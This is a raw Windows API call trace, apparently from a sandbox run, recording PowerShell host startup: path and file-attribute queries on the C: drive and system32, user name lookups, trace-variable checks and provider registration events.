	[0416.573] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d3d0 | out: lpFileInformation=0x20d3d0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0416.573] SetErrorMode (uMode=0x1) returned 0x1
	[0416.573] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20d170, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0416.573] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20d020, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0416.573] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0416.574] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20cf50, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0416.574] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0416.574] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0416.574] SetErrorMode (uMode=0x1) returned 0x1
	[0416.574] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d200 | out: lpFileInformation=0x20d200*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0416.574] SetErrorMode (uMode=0x1) returned 0x1
	[0416.574] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0416.574] SetErrorMode (uMode=0x1) returned 0x1
	[0416.574] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d200 | out: lpFileInformation=0x20d200*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0416.574] SetErrorMode (uMode=0x1) returned 0x1
	[0416.575] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20d040, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0416.575] SetErrorMode (uMode=0x1) returned 0x1
	[0416.575] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d2a0 | out: lpFileInformation=0x20d2a0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0416.575] SetErrorMode (uMode=0x1) returned 0x1
	[0416.575] CoTaskMemAlloc (cb=0x804) returned 0x1b8c5130
	[0416.575] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8c5130, nSize=0x20d6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d6a8) returned 0x1
	[0416.575] CoTaskMemFree (pv=0x1b8c5130) 
	[0416.575] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.575] GetUserNameW (in: lpBuffer=0x2ec760, pcbBuffer=0x20d6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d6e8) returned 1
	[0416.576] CoTaskMemFree (pv=0x2ec760) 
	[0416.576] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e40a70*="FileSystem", lpRawData=0x2e40800) returned 1
	[0416.577] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0416.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.577] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0416.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cf80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.579] CoTaskMemAlloc (cb=0x804) returned 0x1b8c5130
	[0416.579] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8c5130, nSize=0x20d6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d6a8) returned 0x1
	[0416.579] CoTaskMemFree (pv=0x1b8c5130) 
	[0416.579] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0416.579] GetUserNameW (in: lpBuffer=0x2ec760, pcbBuffer=0x20d6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d6e8) returned 1
	[0416.579] CoTaskMemFree (pv=0x2ec760) 
	[0416.580] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e462b0*="Function", lpRawData=0x2e46040) returned 1
	[0416.582] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0416.583] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0416.583] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0416.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.877] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0416.880] CoTaskMemAlloc (cb=0x804) returned 0x1b8c5130
	[0416.880] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8c5130, nSize=0x20d6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d6a8) returned 0x1
	[0417.227] CoTaskMemFree (pv=0x1b8c5130) 
	[0417.227] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0417.227] GetUserNameW (in: lpBuffer=0x2ec760, pcbBuffer=0x20d6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d6e8) returned 1
	[0417.228] CoTaskMemFree (pv=0x2ec760) 
	[0417.228] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e68ad8*="Registry", lpRawData=0x2e68868) returned 1
	[0417.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.509] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0417.510] CoTaskMemAlloc (cb=0x804) returned 0x1b8c5130
	[0417.510] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8c5130, nSize=0x20d6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d6a8) returned 0x1
	[0417.510] CoTaskMemFree (pv=0x1b8c5130) 
	[0417.510] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0417.510] GetUserNameW (in: lpBuffer=0x2ec760, pcbBuffer=0x20d6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d6e8) returned 1
	[0417.510] CoTaskMemFree (pv=0x2ec760) 
	[0417.511] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e6def0*="Variable", lpRawData=0x2e6dc80) returned 1
	[0417.593] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0417.593] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.594] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0417.596] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0417.596] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0417.597] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0417.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0417.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0417.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0417.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x20cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0417.965] CoTaskMemAlloc (cb=0x804) returned 0x1b8ceba0
	[0417.966] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b8ceba0, nSize=0x20d6a8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x20d6a8) returned 0x1
	[0417.966] CoTaskMemFree (pv=0x1b8ceba0) 
	[0417.966] CoTaskMemAlloc (cb=0x204) returned 0x2ec760
	[0417.966] GetUserNameW (in: lpBuffer=0x2ec760, pcbBuffer=0x20d6e8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x20d6e8) returned 1
	[0417.966] CoTaskMemFree (pv=0x2ec760) 
	[0417.967] ReportEventW (hEventLog=0x1ba90008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2e81b08*="Certificate", lpRawData=0x2e81898) returned 1
	[0418.137] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0418.137] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.137] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0418.141] GetLogicalDrives () returned 0x4
	[0418.141] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20d330, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0418.141] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0418.142] CoTaskMemAlloc (cb=0x20e) returned 0x34a210
	[0418.142] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x34a210 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0418.142] CoTaskMemFree (pv=0x34a210) 
	[0418.143] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0418.143] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.143] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0418.144] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0418.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.144] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0418.160] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0418.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.160] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0418.161] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0418.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.161] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0418.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.162] SetErrorMode (uMode=0x1) returned 0x1
	[0418.162] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d2f0 | out: lpFileInformation=0x20d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0418.162] SetErrorMode (uMode=0x1) returned 0x1
	[0418.162] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.163] SetErrorMode (uMode=0x1) returned 0x1
	[0418.163] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d2f0 | out: lpFileInformation=0x20d2f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0418.163] SetErrorMode (uMode=0x1) returned 0x1
	[0418.163] CoTaskMemAlloc (cb=0x104) returned 0x1b8ad2f0
	[0418.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b8ad2f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0418.163] CoTaskMemFree (pv=0x1b8ad2f0) 
	[0418.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d230, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.433] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0418.433] SetErrorMode (uMode=0x1) returned 0x1
	[0418.433] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d2b0 | out: lpFileInformation=0x20d2b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0418.433] SetErrorMode (uMode=0x1) returned 0x1
	[0418.433] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0418.433] SetErrorMode (uMode=0x1) returned 0x1
	[0418.433] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x20d2b0 | out: lpFileInformation=0x20d2b0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0418.434] SetErrorMode (uMode=0x1) returned 0x1
	[0418.434] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x20d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0418.434] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x20cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0418.434] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.434] SetErrorMode (uMode=0x1) returned 0x1
	[0418.434] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20d2b0 | out: lpFileInformation=0x20d2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0418.434] SetErrorMode (uMode=0x1) returned 0x1
	[0418.434] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.434] SetErrorMode (uMode=0x1) returned 0x1
	[0418.434] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x20d2b0 | out: lpFileInformation=0x20d2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0418.435] SetErrorMode (uMode=0x1) returned 0x1
	[0418.435] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x20cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.435] SetErrorMode (uMode=0x1) returned 0x1
	[0418.435] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d2b0 | out: lpFileInformation=0x20d2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0418.435] SetErrorMode (uMode=0x1) returned 0x1
	[0418.435] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.435] SetErrorMode (uMode=0x1) returned 0x1
	[0418.435] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x20d2b0 | out: lpFileInformation=0x20d2b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0418.436] SetErrorMode (uMode=0x1) returned 0x1
	[0418.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x20d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.436] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x20cfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0418.436] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x20d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0418.436] SetErrorMode (uMode=0x1) returned 0x1
